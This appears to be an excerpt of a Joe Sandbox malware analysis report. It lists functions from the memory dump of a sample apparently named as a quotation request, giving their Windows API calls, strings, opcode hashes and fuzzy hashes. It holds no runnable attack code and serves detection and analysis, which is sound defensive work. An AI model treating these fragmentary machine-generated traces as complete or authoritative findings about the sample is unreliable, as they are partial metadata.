                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: db3ace4d6114574bbd7cec214baf3d45f644c71f95aa5ce7b76947328029e7ec
                                                                                                                    • Instruction ID: f7c6622f908ab5c5ff2167794ccabe89aa5b0eb168e6cae8157ab74f1fb002ed
                                                                                                                    • Opcode Fuzzy Hash: db3ace4d6114574bbd7cec214baf3d45f644c71f95aa5ce7b76947328029e7ec
                                                                                                                    • Instruction Fuzzy Hash: 9521A7B2A141187BEF119F54CC45FBB376EEF8A760F118115F9049B190C675DC51A7E0
                                                                                                                    Function 00F849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F84A08
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F84A5C
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00FACC08), ref: 00F84AD0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                    • Opcode ID: 12d91e75015759d190d3fc8018f1c919a0668bdf082dbc3f5c80a20e800c5ed5
                                                                                                                    • Instruction ID: 4cf6df17c15a829fc2989b7d6ab4e9cf426c204fdb69a56b08cddab02fdbc456
                                                                                                                    • Opcode Fuzzy Hash: 12d91e75015759d190d3fc8018f1c919a0668bdf082dbc3f5c80a20e800c5ed5
                                                                                                                    • Instruction Fuzzy Hash: CB318E71A00109AFDB10DF54C881EAA7BF8EF09318F1480A5E909DB252DB75EE45DBA1
                                                                                                                    Function 00FA41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FA424F
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FA4264
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FA4271
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 6e4df4fc63963c08f26761ac4b340a8dda4f52e83f9dcadb290dc64679912300
                                                                                                                    • Instruction ID: 1862c373ea17d106e7b34e2e1b860b49dfa293fb79a540c7eed39d410b25b825
                                                                                                                    • Opcode Fuzzy Hash: 6e4df4fc63963c08f26761ac4b340a8dda4f52e83f9dcadb290dc64679912300
                                                                                                                    • Instruction Fuzzy Hash: 99110671640248BEEF205F29CC46FAB3BACEFC6B64F010124FA55E6090D6B1EC51AB60
                                                                                                                    Function 00F72F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
                                                                                                                      • Part of subcall function 00F72DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F72DC5
                                                                                                                      • Part of subcall function 00F72DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F72DD6
                                                                                                                      • Part of subcall function 00F72DA7: GetCurrentThreadId.KERNEL32 ref: 00F72DDD
                                                                                                                      • Part of subcall function 00F72DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F72DE4
                                                                                                                    • GetFocus.USER32 ref: 00F72F78
                                                                                                                      • Part of subcall function 00F72DEE: GetParent.USER32(00000000), ref: 00F72DF9
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F72FC3
                                                                                                                    • EnumChildWindows.USER32(?,00F7303B), ref: 00F72FEB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                    • String ID: %s%d
                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                    • Opcode ID: ae9f1fc4c92e1e1be7eacec836bdb37dabaa2424e892523f297d54eb1849d502
                                                                                                                    • Instruction ID: e8b34b84397137b558f2d3acd8e920307c7d0d86fe31364845833c7d28c83d07
                                                                                                                    • Opcode Fuzzy Hash: ae9f1fc4c92e1e1be7eacec836bdb37dabaa2424e892523f297d54eb1849d502
                                                                                                                    • Instruction Fuzzy Hash: E211B4B16002096BCF54BF708C85EED377AAF84314F04807AF90DDB252DE349949BB62
                                                                                                                    Function 00FA5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA58C1
                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA58EE
                                                                                                                    • DrawMenuBar.USER32(?), ref: 00FA58FD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                    • Opcode ID: 06fcf14579bd141cd8ae5ef8441dc6cf8fd4fc0e0ad05edbcd4b8b4a5c9b8b5b
                                                                                                                    • Instruction ID: 7c11b642e7c9d416d80d66f5bd5b4c35c8424efda94fb6d05a593778b742dc6d
                                                                                                                    • Opcode Fuzzy Hash: 06fcf14579bd141cd8ae5ef8441dc6cf8fd4fc0e0ad05edbcd4b8b4a5c9b8b5b
                                                                                                                    • Instruction Fuzzy Hash: 7B015E71910218EEDB119F11EC44BAFBBB4FF4A760F1480A9F849DA151DB308A84FF61
                                                                                                                    Function 00F6D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F6D3BF
                                                                                                                    • FreeLibrary.KERNEL32 ref: 00F6D3E5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                    • API String ID: 3013587201-2590602151
                                                                                                                    • Opcode ID: c235d79917900833c9c5c57694fe2f3666bbf2eb5898320e22569994ca622c21
                                                                                                                    • Instruction ID: 29e27f1dedb1f421527d40b921ba2cc42e0b7b60eb6cf37d800331344cae631d
                                                                                                                    • Opcode Fuzzy Hash: c235d79917900833c9c5c57694fe2f3666bbf2eb5898320e22569994ca622c21
                                                                                                                    • Instruction Fuzzy Hash: D1F02BF6F05731DBD77156124C75B693324AF11705B598155F402EA207E760CD44B6D2
                                                                                                                    Function 00F7007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bcd9a16cd8fa615747dc87a71586e042815d23f9daf3db393c5765680f2590ba
                                                                                                                    • Instruction ID: 0fe0c1130e8e8671ef8f7200c6533c0d32c5fa90470e64159ae6dafb66628c24
                                                                                                                    • Opcode Fuzzy Hash: bcd9a16cd8fa615747dc87a71586e042815d23f9daf3db393c5765680f2590ba
                                                                                                                    • Instruction Fuzzy Hash: EBC15B75A0020AEFDB14CFA4C894BAEB7B5FF48314F108599E409EB291DB71ED41EB91
                                                                                                                    Function 00F43E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1036877536-0
                                                                                                                    • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                    • Instruction ID: 4f48d7d9baa0600dc128ae071b260bfa7aa50fd41bac0774eaa4e371413dda20
                                                                                                                    • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                    • Instruction Fuzzy Hash: 25A14972D003869FEB16CF18C8917AEBFF4EF61360F14416DED95AB281C638A985E750
                                                                                                                    Function 00F9342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1998397398-0
                                                                                                                    • Opcode ID: 96409ab37742e99ac279337fb5396957a69451fddc107862745c0876cb071900
                                                                                                                    • Instruction ID: aea2c54fb277f7f0016487be6217c23efa0ef518c2ce4cb4acfb8b3f3703ebe3
                                                                                                                    • Opcode Fuzzy Hash: 96409ab37742e99ac279337fb5396957a69451fddc107862745c0876cb071900
                                                                                                                    • Instruction Fuzzy Hash: C3A15E756043109FDB10EF24C885E5AB7E5FF88714F088859F9899B362DB34ED41EB92
                                                                                                                    Function 00F70436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F705F0
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F70608
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00FACC40,000000FF,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F7062D
                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00F7064E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 314563124-0
                                                                                                                    • Opcode ID: 4f1daf6233c99fc59f33408604378d21623167f43de1ff66c553222181510839
                                                                                                                    • Instruction ID: 4811171f598963beaafc30d02568a451fe36e42905dee5b2dd43ce5cf6821b7a
                                                                                                                    • Opcode Fuzzy Hash: 4f1daf6233c99fc59f33408604378d21623167f43de1ff66c553222181510839
                                                                                                                    • Instruction Fuzzy Hash: D5813971A00109EFCB04DF94C984EEEB7B9FF89315F248159F506AB250DB71AE06DBA1
                                                                                                                    Function 00F51391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: 7643e40ea097f9bb8179302aba4f0b5d3ad73ca3ca4790860d751fddc92981c9
                                                                                                                    • Instruction ID: a56895ace15bb654cec0d6436b5752dde0056be817029fff05bc20c792b51b2c
                                                                                                                    • Opcode Fuzzy Hash: 7643e40ea097f9bb8179302aba4f0b5d3ad73ca3ca4790860d751fddc92981c9
                                                                                                                    • Instruction Fuzzy Hash: E9411932E00500ABDB21EBB99C45BBE3AA5FF43371F144225FE19D6192E67CA8497271
                                                                                                                    Function 00FA6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(0123EA18,?), ref: 00FA62E2
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00FA6315
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FA6382
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: 25a64c973ca105fb6fe8f531c8d3525a225eacd89eeb9e6fb90a970aa9033347
                                                                                                                    • Instruction ID: e3b0b8b5183b518d65c0fe589a2704aad9ec0f2a53ce6e2a8478b1706d041c84
                                                                                                                    • Opcode Fuzzy Hash: 25a64c973ca105fb6fe8f531c8d3525a225eacd89eeb9e6fb90a970aa9033347
                                                                                                                    • Instruction Fuzzy Hash: BF511AB4A00249EFDF10DF68D880AAE7BB5FB56360F148169F915DB290D730AD81EB90
                                                                                                                    Function 00F91AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F91AFD
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91B0B
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F91B8A
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00F91B94
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1881357543-0
                                                                                                                    • Opcode ID: f8f9f1db94745257497cd644aeef6f4a1fda7c7d5c99ac7cb3dec4c4663fd341
                                                                                                                    • Instruction ID: 1bea4f391ba08e1b8368bb7639dfb6bdf0a072e24688e290253c6f75731725e2
                                                                                                                    • Opcode Fuzzy Hash: f8f9f1db94745257497cd644aeef6f4a1fda7c7d5c99ac7cb3dec4c4663fd341
                                                                                                                    • Instruction Fuzzy Hash: AA41D135640200AFEB20AF24C886F6577E5AB84718F54C458F91A9F3D3D776ED829B90
                                                                                                                    Function 00F4B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11cbb64a1d831ecfde1d808fd0416dcab25cbe96b4fcd5aa5479f23a78481d0c
                                                                                                                    • Instruction ID: 100caf6a737b3aae161264040b0281cf1c2bea63ca8e6f90c669e6b5090d887e
                                                                                                                    • Opcode Fuzzy Hash: 11cbb64a1d831ecfde1d808fd0416dcab25cbe96b4fcd5aa5479f23a78481d0c
                                                                                                                    • Instruction Fuzzy Hash: BF410872A00304AFD724DF38CC41BAABFA9EB88720F10462AF955DB693D775E9059790
                                                                                                                    Function 00F856D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F85783
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00F857A9
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F857CE
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F857FA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: f88083662d76be95b40e44970e6a864c6c22dc840b38629e8fdf5bf98bf6bcf9
                                                                                                                    • Instruction ID: ade60578695804578c1549735d209cae9d7877dbeb197ea31b66f0fbbf71cf7b
                                                                                                                    • Opcode Fuzzy Hash: f88083662d76be95b40e44970e6a864c6c22dc840b38629e8fdf5bf98bf6bcf9
                                                                                                                    • Instruction Fuzzy Hash: 49414F35600610DFCB11EF15C844A9DBBF2EF49720B18C488E84A9B366CB34FD41EB91
                                                                                                                    Function 00F4D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F36D71,00000000,00000000,00F382D9,?,00F382D9,?,00000001,00F36D71,8BE85006,00000001,00F382D9,00F382D9), ref: 00F4D910
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4D999
                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F4D9AB
                                                                                                                    • __freea.LIBCMT ref: 00F4D9B4
                                                                                                                      • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
